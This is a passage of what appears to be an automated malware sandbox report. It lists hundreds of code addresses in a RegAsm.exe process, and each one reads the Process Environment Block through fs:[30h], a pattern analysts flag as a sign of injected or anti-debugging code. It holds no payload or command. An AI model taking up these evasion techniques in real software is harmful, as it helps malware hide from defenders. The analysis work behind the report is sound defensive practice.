Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov ecx, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318A352 mov eax, dword ptr fs:[00000030h] 6_2_0318A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195341 mov eax, dword ptr fs:[00000030h] 6_2_03195341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9353 mov eax, dword ptr fs:[00000030h] 6_2_030B9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9353 mov eax, dword ptr fs:[00000030h] 6_2_030B9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316437C mov eax, dword ptr fs:[00000030h] 6_2_0316437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F367 mov eax, dword ptr fs:[00000030h] 6_2_0317F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7370 mov eax, dword ptr fs:[00000030h] 6_2_030C7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7370 mov eax, dword ptr fs:[00000030h] 6_2_030C7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7370 mov eax, dword ptr fs:[00000030h] 6_2_030C7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E438F mov eax, dword ptr fs:[00000030h] 6_2_030E438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E438F mov eax, dword ptr fs:[00000030h] 6_2_030E438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BE388 mov eax, dword ptr fs:[00000030h] 6_2_030BE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BE388 mov eax, dword ptr fs:[00000030h] 6_2_030BE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BE388 mov eax, dword ptr fs:[00000030h] 6_2_030BE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319539D mov eax, dword ptr fs:[00000030h] 6_2_0319539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0311739A mov eax, dword ptr fs:[00000030h] 6_2_0311739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0311739A mov eax, dword ptr fs:[00000030h] 6_2_0311739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B8397 mov eax, dword ptr fs:[00000030h] 6_2_030B8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B8397 mov eax, dword ptr fs:[00000030h] 6_2_030B8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B8397 mov eax, dword ptr fs:[00000030h] 6_2_030B8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E33A5 mov eax, dword ptr fs:[00000030h] 6_2_030E33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F33A0 mov eax, dword ptr fs:[00000030h] 6_2_030F33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F33A0 mov eax, dword ptr fs:[00000030h] 6_2_030F33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317B3D0 mov ecx, dword ptr fs:[00000030h] 6_2_0317B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C83C0 mov eax, dword ptr fs:[00000030h] 6_2_030C83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C83C0 mov eax, dword ptr fs:[00000030h] 6_2_030C83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C83C0 mov eax, dword ptr fs:[00000030h] 6_2_030C83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C83C0 mov eax, dword ptr fs:[00000030h] 6_2_030C83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C3CD mov eax, dword ptr fs:[00000030h] 6_2_0317C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031953FC mov eax, dword ptr fs:[00000030h] 6_2_031953FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F63FF mov eax, dword ptr fs:[00000030h] 6_2_030F63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F3E6 mov eax, dword ptr fs:[00000030h] 6_2_0317F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE3F0 mov eax, dword ptr fs:[00000030h] 6_2_030DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE3F0 mov eax, dword ptr fs:[00000030h] 6_2_030DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE3F0 mov eax, dword ptr fs:[00000030h] 6_2_030DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F7208 mov eax, dword ptr fs:[00000030h] 6_2_030F7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F7208 mov eax, dword ptr fs:[00000030h] 6_2_030F7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B823B mov eax, dword ptr fs:[00000030h] 6_2_030B823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195227 mov eax, dword ptr fs:[00000030h] 6_2_03195227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317B256 mov eax, dword ptr fs:[00000030h] 6_2_0317B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317B256 mov eax, dword ptr fs:[00000030h] 6_2_0317B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F724D mov eax, dword ptr fs:[00000030h] 6_2_030F724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9240 mov eax, dword ptr fs:[00000030h] 6_2_030B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9240 mov eax, dword ptr fs:[00000030h] 6_2_030B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6259 mov eax, dword ptr fs:[00000030h] 6_2_030C6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA250 mov eax, dword ptr fs:[00000030h] 6_2_030BA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B826B mov eax, dword ptr fs:[00000030h] 6_2_030B826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03101270 mov eax, dword ptr fs:[00000030h] 6_2_03101270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03101270 mov eax, dword ptr fs:[00000030h] 6_2_03101270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4260 mov eax, dword ptr fs:[00000030h] 6_2_030C4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4260 mov eax, dword ptr fs:[00000030h] 6_2_030C4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4260 mov eax, dword ptr fs:[00000030h] 6_2_030C4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318D26B mov eax, dword ptr fs:[00000030h] 6_2_0318D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318D26B mov eax, dword ptr fs:[00000030h] 6_2_0318D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E9274 mov eax, dword ptr fs:[00000030h] 6_2_030E9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FE284 mov eax, dword ptr fs:[00000030h] 6_2_030FE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FE284 mov eax, dword ptr fs:[00000030h] 6_2_030FE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F329E mov eax, dword ptr fs:[00000030h] 6_2_030F329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F329E mov eax, dword ptr fs:[00000030h] 6_2_030F329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195283 mov eax, dword ptr fs:[00000030h] 6_2_03195283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov eax, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov eax, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov ecx, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov ecx, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02A0 mov eax, dword ptr fs:[00000030h] 6_2_030D02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02A0 mov eax, dword ptr fs:[00000030h] 6_2_030D02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov ecx, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031572A0 mov eax, dword ptr fs:[00000030h] 6_2_031572A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031572A0 mov eax, dword ptr fs:[00000030h] 6_2_031572A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C92C5 mov eax, dword ptr fs:[00000030h] 6_2_030C92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C92C5 mov eax, dword ptr fs:[00000030h] 6_2_030C92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF2D0 mov eax, dword ptr fs:[00000030h] 6_2_030EF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF2D0 mov eax, dword ptr fs:[00000030h] 6_2_030EF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F2F8 mov eax, dword ptr fs:[00000030h] 6_2_0317F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B92FF mov eax, dword ptr fs:[00000030h] 6_2_030B92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031952E2 mov eax, dword ptr fs:[00000030h] 6_2_031952E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03180115 mov eax, dword ptr fs:[00000030h] 6_2_03180115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov ecx, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 mov eax, dword ptr fs:[00000030h] 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F0124 mov eax, dword ptr fs:[00000030h] 6_2_030F0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C1131 mov eax, dword ptr fs:[00000030h] 6_2_030C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C1131 mov eax, dword ptr fs:[00000030h] 6_2_030C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB136 mov eax, dword ptr fs:[00000030h] 6_2_030BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9148 mov eax, dword ptr fs:[00000030h] 6_2_030B9148
